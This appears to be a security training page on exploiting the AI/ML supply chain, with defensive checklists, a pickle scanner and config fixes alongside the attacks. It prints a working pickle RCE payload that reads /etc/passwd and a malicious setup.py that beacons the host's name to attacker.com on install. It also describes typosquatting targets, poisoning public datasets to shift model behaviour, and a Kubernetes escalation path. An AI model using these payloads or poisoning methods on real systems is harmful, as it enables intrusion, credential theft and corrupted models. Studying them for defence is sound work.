AI Supply Chain Exploitation
Methodology for exploiting the AI/ML supply chain: model serialization RCE, dependency confusion, dataset poisoning, CI/CD injection, and container escape.
The AI/ML supply chain relies on implicit trust at every layer: models downloaded as opaque binary blobs, datasets pulled from unverified sources, and training pipelines that execute arbitrary code during preprocessing. Unlike traditional software supply chains with signatures and checksums, the ML ecosystem normalizes running untrusted code as standard practice.
Model Serialization Attacks
Methodology
Craft a basic pickle RCE payload

The `__reduce__` method tells pickle how to reconstruct an object. Return `os.system` with a shell command to achieve code execution on `pickle.loads()`.

```python
import os
import pickle

class MaliciousModel:
    def __reduce__(self):
        # pickle records this callable and its arguments; both are
        # executed when pickle.loads() reconstructs the object
        return (os.system, ("id; whoami; cat /etc/passwd",))

payload = pickle.dumps(MaliciousModel())
# pickle.loads(payload) triggers RCE
```

Embed the payload in a PyTorch model file

PyTorch's `torch.save()` uses pickle internally. Create a trojan model that executes the payload during `torch.load()` while returning valid weights so the victim notices nothing wrong.

Distribute via HuggingFace Hub

Upload the weaponized model to HuggingFace Hub using one of the attack vectors below.
HuggingFace Attack Vectors
| Vector | Technique | Detection Difficulty |
|---|---|---|
| Typosquatting | Upload model under a name nearly identical to a popular repo (e.g., `meta-Ilama` with a capital "I" vs `meta-llama`) | Low — requires user to notice the typo |
| Malicious custom code | config.json points to custom modeling_*.py that runs on trust_remote_code=True | Medium — code is visible but rarely reviewed |
| Poisoned tokenizer | Custom tokenizer_config.json references executable tokenizer code | High — scanners focus on model files |
| Model card phishing | README with malicious links directing to trojanized external downloads | Low — social engineering |
Safetensors Limitations
Safetensors eliminates code execution from the weight files themselves, but important gaps remain:
- Models may still require pickle for optimizer states, training config, or custom architectures
- Loaders may fall back to pickle if safetensors files are missing
- `trust_remote_code=True` executes arbitrary Python regardless of weight format
- A model card can claim safetensors format while the actual files are pickle
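Because these gaps keep pickle in the loading path, pickle bytestreams can be statically inspected for dangerous imports before loading (the approach tools like Fickling automate). A minimal sketch using only the stdlib `pickletools` module; it handles the `GLOBAL` opcode of protocols 0-3, while protocol 4+ emits `STACK_GLOBAL` and needs additional stack tracking:

```python
import os
import pickle
import pickletools

# Modules whose import inside a pickle is a strong RCE indicator
DANGEROUS_MODULES = {"os", "posix", "nt", "subprocess", "builtins"}

def pickle_imports(data: bytes):
    """Return (module, name) pairs a protocol <= 3 pickle would import on load."""
    imports = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":  # arg is the string "module name"
            module, name = arg.split(" ", 1)
            imports.append((module, name))
        # Protocol 4+ uses STACK_GLOBAL, which takes module/name from the
        # stack and requires more bookkeeping to resolve statically.
    return imports

class MaliciousModel:
    def __reduce__(self):
        return (os.system, ("id",))

payload = pickle.dumps(MaliciousModel(), protocol=2)
flagged = [(m, n) for m, n in pickle_imports(payload) if m in DANGEROUS_MODULES]
print(flagged)  # os.system serializes under the platform module (posix/nt)
```

The key property: the scan never executes the stream, so it is safe to run on untrusted model files before any `torch.load()`.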
Dependency Confusion and Typosquatting
Dependency confusion exploits the interaction between private and public package indices.
Attack Steps
Identify internal package names
Enumerate internal ML package names from job postings, GitHub repos, error messages, or documentation leaks.
Publish to public PyPI with a high version

Create a package with the same name and an inflated version such as `99.0.0`. If the target uses `--extra-index-url` (instead of `--index-url`), pip considers both indices and installs the higher version from public PyPI.

```python
# setup.py for the malicious package
from setuptools import setup
import os
import urllib.request

try:
    # Install-time beacon: report which host pulled the package
    hostname = os.uname().nodename
    urllib.request.urlopen(f"https://attacker.com/dep-confusion?host={hostname}")
except Exception:
    pass

setup(name="acme-ml-utils", version="99.0.0", packages=["acme_ml_utils"])
```

Exploit typosquatting for broader targeting
Target commonly mistyped ML package names.
Common Typosquat Targets
| Legitimate Package | Typosquat Variants |
|---|---|
| transformers | transformer, transfomers, transformrs |
| torch | pytoch, tourch, troch |
| tensorflow | tenserflow, tensorflw |
| langchain | langchian, lanchain |
| openai | opanai, openaii |
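The defensive counterpart is to never let pip race a public index against the private one. A configuration sketch (the index URL is a hypothetical placeholder): route all installs through a single authoritative private index that mirrors public PyPI for open-source dependencies, so internal names are never resolved publicly:

```ini
# pip.conf — single authoritative index, no --extra-index-url races.
# The private index proxies public PyPI for open-source packages,
# so internal package names can never be shadowed from outside.
[global]
index-url = https://pypi.internal.example.com/simple
```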
Dataset Poisoning
Datasets on HuggingFace Datasets, Kaggle, and academic repositories are consumed with minimal verification. Two primary attack patterns:
| Attack | Method | Impact |
|---|---|---|
| Public dataset manipulation | Submit PRs adding plausible samples with subtly dangerous advice (e.g., "store API keys in source code") | Shifts model behavior at scale without any single sample being flagged |
| Data pipeline injection | Compromise external data URLs referenced by training configs, or DNS-hijack the data source | Full control over training data with no integrity check to bypass |
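The pipeline-injection row works precisely because there is no integrity check to bypass. A minimal stdlib sketch of the missing control, verifying a downloaded dataset against a known-good digest (the expected hash is whatever the data publisher pins out-of-band):

```python
import hashlib

def sha256_file(path: str) -> str:
    """Stream a file through SHA-256 without loading it all into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()

def verify_dataset(path: str, expected_sha256: str) -> bool:
    # Compare against a pinned digest before any preprocessing runs
    return sha256_file(path) == expected_sha256
```

Run the check immediately after download and before the preprocessing step, since preprocessing is itself arbitrary code operating on the data.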
CI/CD Pipeline Injection
Vulnerable ML Pipeline Checklist
Audit ML training workflows for these four critical flaws:
| Vulnerability | Risk | What to Look For |
|---|---|---|
| PR-triggered builds on self-hosted runners | Fork PR executes arbitrary code on GPU infrastructure | on: pull_request + runs-on: [self-hosted, gpu] |
| Unpinned dependencies | Dependency substitution during pip install | pip install -r requirements.txt without version pins or hashes |
| Secret exposure to PR builds | API keys exfiltrated by fork contributors | ${{ secrets.* }} in PR-triggered jobs |
| Unverified data downloads | Training data replaced via MITM or DNS hijack | python scripts/download_data.py without integrity checks |
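Put together, a workflow exhibiting all four flaws looks roughly like this (hypothetical project names; a sketch of what the checklist flags, not a real configuration):

```yaml
# .github/workflows/train.yml — each marked line maps to a checklist row
on: pull_request                          # fork PRs trigger the build
jobs:
  train:
    runs-on: [self-hosted, gpu]           # arbitrary PR code on GPU infra
    env:
      HF_TOKEN: ${{ secrets.HF_TOKEN }}   # secret exposed to PR builds
    steps:
      - uses: actions/checkout@v4
      - run: pip install -r requirements.txt   # no version pins or hashes
      - run: python scripts/download_data.py   # no integrity check
      - run: python train.py
```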
Experiment Tracking as Attack Surface
With MLflow tracking server access, an attacker can:
- Alter hyperparameters loaded by training runs
- Redirect artifact references to malicious model checkpoints
- Modify dataset version tags to point to poisoned data
- Overwrite production model registrations with trojanized checkpoints
Container Escape in ML Infrastructure
GPU Container Attack Surface
GPU containers expand the standard container attack surface because they typically require:
| Requirement | Security Impact |
|---|---|
| Privileged mode or /dev/nvidia* access | Kernel-level escalation paths |
| NVIDIA Container Toolkit | Additional driver attack surface |
| Large shared memory (/dev/shm) | Cross-container data leakage |
| NFS mounts for model/data storage | Lateral access to production models and data lakes |
GPU Memory Remnant Scanning
On shared GPU infrastructure, previous tenants' data (model weights, training samples, API keys) may persist in uninitialized GPU memory. Allocate uninitialized tensors via `torch.empty(..., device='cuda')` and scan for non-zero values.
Kubernetes ML Cluster Escalation Path
1. Compromise the training job: via a poisoned dependency or data pipeline injection.
2. Read mounted secrets: AWS credentials and HuggingFace tokens from mounted Kubernetes secrets.
3. Access shared model storage: replace production models on NFS mounts with trojaned versions.
4. Pivot to the data lake: exfiltrate training data from shared mounts.
5. Escape to the node: use privileged container access (`privileged: true`) for node-level compromise.
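The final escape step hinges on pod security settings. The red flags in a training-job spec look roughly like this (hypothetical image and mount names):

```yaml
# Kubernetes pod spec fragment — what to audit for in ML training jobs
spec:
  containers:
    - name: trainer
      image: registry.internal/train:latest
      securityContext:
        privileged: true          # full device/kernel access; enables node escape
      volumeMounts:
        - name: models
          mountPath: /mnt/models  # shared NFS: lateral access to production models
```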
Supply Chain Audit Checklist
| Area | Key Questions |
|---|---|
| Model provenance | Checksums verified? weights_only=True or safetensors? trust_remote_code reviewed? Repos pinned to commits? |
| Dependencies | Exact version pins? Private PyPI with priority? Hash verification (--require-hashes)? Transitive deps audited? |
| Data integrity | Datasets checksummed? TLS with cert verification? Preprocessing scripts code-reviewed? Provenance tracked? |
| CI/CD | PR execution restricted? Secrets scoped to branches? Self-hosted runners isolated and ephemeral? Training/deployment separated? |
| Containers | Running without --privileged? GPU memory cleared between tenants? Images scanned? Network egress restricted? |
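For the dependency rows, hash verification can be operationalized with pip-tools (commands sketched under the assumption that `requirements.in` lists the top-level dependencies):

```shell
# Resolve every transitive dependency and pin its artifact hash
pip-compile --generate-hashes -o requirements.txt requirements.in
# Refuse to install any artifact whose hash is not pinned
pip install --require-hashes -r requirements.txt
```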
Related Topics
- Pickle Exploits — Pickle deserialization is a key supply chain vector
- App Security — Application-level security for AI systems
Your target uses `--extra-index-url` for a private PyPI index alongside public PyPI. Why is this vulnerable to dependency confusion?
References
- OWASP Machine Learning Security Top 10 — ML-specific supply chain risks
- Hugging Face Security — Model hub security documentation
- Fickling: Pickle decompiler and static analyzer — Trail of Bits pickle security tool